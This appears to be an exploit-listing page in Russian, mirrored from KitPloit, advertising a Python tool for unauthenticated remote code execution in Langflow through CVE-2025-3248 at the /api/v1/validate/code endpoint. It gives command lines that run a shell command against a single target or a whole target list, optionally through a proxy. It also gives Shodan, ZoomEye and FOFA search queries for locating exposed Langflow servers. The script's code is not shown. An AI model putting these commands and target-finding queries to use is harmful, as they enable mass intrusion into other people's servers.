## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZAPSTIKO-CVE-2025-3248
# CVE-2025-3248 — Эксплойт RCE для Langflow
Эксплойт удаленного выполнения кода (RCE) для приложений **Langflow** , уязвимых к **CVE-2025-3248**.
* **Уязвимая конечная точка:** `/api/v1/validate/code`
* * *
## 🚀 Возможности эксплойта
* 🔓 Удаленный RCE без аутентификации
* 🔐 Аутентификация не требуется
* 🐍 Односценарный скрипт на Python3
* 🎨 Цветной вывод в терминал для наглядности
* * *
## 🔧 Использование
root@kitploit:~
python3 langflow_rce.py -u http://target:7860 -c "id"
python3 langflow_rce.py -i target.txt -c "id"
python3 langflow_rce.py -i target.txt -c "id" -p http://127.0.0.1:8080
## Dork
root@kitploit:~
Shodan:
http.title:"Langflow" "Langflow allows you to build LLM applications"
title:"Langflow"
ZoomEye:
title:"Langflow" && body:"Langflow allows you to build LLM applications"
app:"Langflow"
FOFA:
title="Langflow" && body="Langflow allows you to build LLM applications"
app="Langflow"